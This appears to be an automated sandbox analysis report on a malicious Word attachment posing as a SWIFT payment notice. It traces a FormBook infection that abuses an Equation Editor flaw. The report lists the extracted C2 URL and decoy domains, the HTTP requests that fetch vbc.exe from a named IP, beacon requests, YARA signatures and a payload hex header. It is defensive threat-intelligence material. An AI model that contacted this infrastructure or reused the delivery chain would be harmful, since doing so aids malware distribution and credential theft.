Loading ...

Play interactive tourEdit tour

Analysis Report Swift_Payment.MT103.docx

Overview

General Information

Sample Name:Swift_Payment.MT103.docx
Analysis ID:433305
MD5:b222a3ced51fbd79d5fb84bbca12e509
SHA1:bc2f5c72b5e3ddd58e991d83c94cb071152a2671
SHA256:3332ad1461dc79f815e43bf55a6e105bddef5324468b041a97457de7dfcaf2b4
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Contains an external reference to another document
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2512 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2888 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2296 cmdline: 'C:\Users\Public\vbc.exe' MD5: 616A10FDC3307FD483916E1B578C9F9C)
      • vbc.exe (PID: 3040 cmdline: C:\Users\Public\vbc.exe MD5: 616A10FDC3307FD483916E1B578C9F9C)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • NAPSTAT.EXE (PID: 2244 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
            • cmd.exe (PID: 2236 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rocketschool.net/nf2/"], "decoy": ["avlholisticdentalcare.com", "coolermassmedia.com", "anythingneverything.net", "maimaixiu.club", "veyconcorp.com", "rplelectro.com", "koch-mannes.club", "tecknetpro.com", "getresurface.net", "mertzengin.com", "nbppfanzgn.com", "508hill.com", "ourdailydelights.com", "aimeesambayan.com", "productstoredt.com", "doublelblonghorns.com", "lucidcurriculum.com", "thegoddessnow.com", "qywqmjku.icu", "yonibymina.com", "fair-employer.institute", "loundxgroup.com", "grandcanyonbean.com", "gmailanalytics.tools", "e-deers.tech", "gxbokee.com", "saimeisteel.com", "walnutcreekresidences.com", "catalinaislandlodging.com", "financassexy.com", "wtuydga.icu", "agrestorationil.com", "guidenconsultants.com", "annazon-pc.xyz", "trinamorris.com", "dealwiththeboss.com", "touchedbyastar.com", "myenduringlegacy.com", "livegirlroom.com", "managainstthegrain.com", "wikige.com", "muyiyang233.com", "dopegraphicz.com", "varietyarena.com", "henohenomohej.com", "wx323.com", "k1ck1td0wn.com", "fundsvalley.com", "ebike-ny.com", "xn--yedekparaclar-pgb62i.com", "vidssea.com", "wifiultraboostavis.com", "exploitconstruction.com", "freddeveld.com", "kslux.com", "couplealamo.icu", "touchwood-card.com", "k8vina51.com", "thrivwnt.com", "earlybirdwormfarm.com", "hayyaabaya.com", "holidayhomeinfrance.com", "ssalmeria.com", "nivxros.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000007.00000000.2215103438.000000000293F000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 27 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        6.2.vbc.exe.400000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.2.vbc.exe.400000.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          6.2.vbc.exe.400000.2.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18409:$sqlite3step: 68 34 1C 7B E1
          • 0x1851c:$sqlite3step: 68 34 1C 7B E1
          • 0x18438:$sqlite3text: 68 38 2A 90 C5
          • 0x1855d:$sqlite3text: 68 38 2A 90 C5
          • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
          6.2.vbc.exe.400000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            6.2.vbc.exe.400000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 7 entries

            Sigma Overview

            Exploits:

            barindex
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2888, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vbc[1].exe

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2888, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2296
            Sigma detected: Execution from Suspicious FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2888, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2296

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\o[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27720357.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
            Found malware configurationShow sources
            Source: 00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.rocketschool.net/nf2/"], "decoy": ["avlholisticdentalcare.com", "coolermassmedia.com", "anythingneverything.net", "maimaixiu.club", "veyconcorp.com", "rplelectro.com", "koch-mannes.club", "tecknetpro.com", "getresurface.net", "mertzengin.com", "nbppfanzgn.com", "508hill.com", "ourdailydelights.com", "aimeesambayan.com", "productstoredt.com", "doublelblonghorns.com", "lucidcurriculum.com", "thegoddessnow.com", "qywqmjku.icu", "yonibymina.com", "fair-employer.institute", "loundxgroup.com", "grandcanyonbean.com", "gmailanalytics.tools", "e-deers.tech", "gxbokee.com", "saimeisteel.com", "walnutcreekresidences.com", "catalinaislandlodging.com", "financassexy.com", "wtuydga.icu", "agrestorationil.com", "guidenconsultants.com", "annazon-pc.xyz", "trinamorris.com", "dealwiththeboss.com", "touchedbyastar.com", "myenduringlegacy.com", "livegirlroom.com", "managainstthegrain.com", "wikige.com", "muyiyang233.com", "dopegraphicz.com", "varietyarena.com", "henohenomohej.com", "wx323.com", "k1ck1td0wn.com", "fundsvalley.com", "ebike-ny.com", "xn--yedekparaclar-pgb62i.com", "vidssea.com", "wifiultraboostavis.com", "exploitconstruction.com", "freddeveld.com", "kslux.com", "couplealamo.icu", "touchwood-card.com", "k8vina51.com", "thrivwnt.com", "earlybirdwormfarm.com", "hayyaabaya.com", "holidayhomeinfrance.com", "ssalmeria.com", "nivxros.com"]}
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vbc[1].exeReversingLabs: Detection: 26%
            Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 26%
            Multi AV Scanner detection for submitted fileShow sources
            Source: Swift_Payment.MT103.docxVirustotal: Detection: 8%Perma Link
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.2215103438.000000000293F000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2443316419.0000000000230000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2185257430.0000000003239000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2224718389.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.2183018548.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2224913904.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2185374644.000000000333A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 6.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: 6.2.vbc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 6.0.vbc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
            Source: Binary string: napstat.pdb source: vbc.exe, 00000006.00000002.2224936502.0000000000370000.00000040.00000001.sdmp
            Source: Binary string: SByteTypeInfo.pdb source: vbc.exe, vbc.exe.3.dr
            Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h5_2_0431A0D0
            Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h5_2_04319F50
            Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi6_2_00416CA0
            Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 4x nop then pop edi8_2_00096CA0
            Source: global trafficDNS query: name: xy2.eu
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 93.157.97.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 93.157.97.6:80

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49170 -> 93.157.97.6:80
            Source: TrafficSnort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49171 -> 93.157.97.6:80
            Source: TrafficSnort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49175 -> 93.157.97.6:80
            Source: TrafficSnort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49176 -> 93.157.97.6:80
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.rocketschool.net/nf2/
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 11 Jun 2021 13:59:27 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7Last-Modified: Fri, 11 Jun 2021 00:12:45 GMTETag: "e5400-5c4725dfdba60"Accept-Ranges: bytesContent-Length: 939008Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 1b aa c2 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 a8 0b 00 00 a8 02 00 00 00 00 00 fe c5 0b 00 00 20 00 00 00 e0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0e 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 b0 c5 0b 00 4b 00 00 00 00 00 0c 00 88 a3 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0e 00 0c 00 00 00 5f c5 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 a6 0b 00 00 20 00 00 00 a8 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 e8 01 00 00 00 e0 0b 00 00 02 00 00 00 ac 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 a3 02 00 00 00 0c 00 00 a4 02 00 00 ae 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0e 00 00 02 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: GET /nf2/?3f=yN98b8Y8Z6WLDXm&2dD=tY9gjdf+e0hI0IQM1PZNybK1EoaTSj9tXYNl6mrH9NUWEbudMWFuSJgZaQwKiXXMis7UDA== HTTP/1.1Host: www.loundxgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /nf2/?2dD=YwAVTFHcJ3tZ7puGaNBEVYFOXylMSmgTpe329QapfLZNS+2gp2G7sp/TZUhMZxkhnyNZKA==&3f=yN98b8Y8Z6WLDXm HTTP/1.1Host: www.grandcanyonbean.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 93.157.97.6 93.157.97.6
            Source: Joe Sandbox ViewASN Name: DIGICABLEHU DIGICABLEHU
            Source: Joe Sandbox ViewASN Name: OGICOMPL OGICOMPL
            Source: global trafficHTTP traffic detected: GET /e9yj HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: xy2.euConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /?redirect=e9yj HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: xy2.euConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /oti/o.dot HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 192.3.141.164Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /oti/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.164Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.141.164
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B5FAB51B-61BE-41BF-89DB-AF92964D1C77}.tmpJump to behavior
            Source: global trafficHTTP traffic detected: GET /e9yj HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: xy2.euConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /?redirect=e9yj HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: xy2.euConnection: Keep-Alive
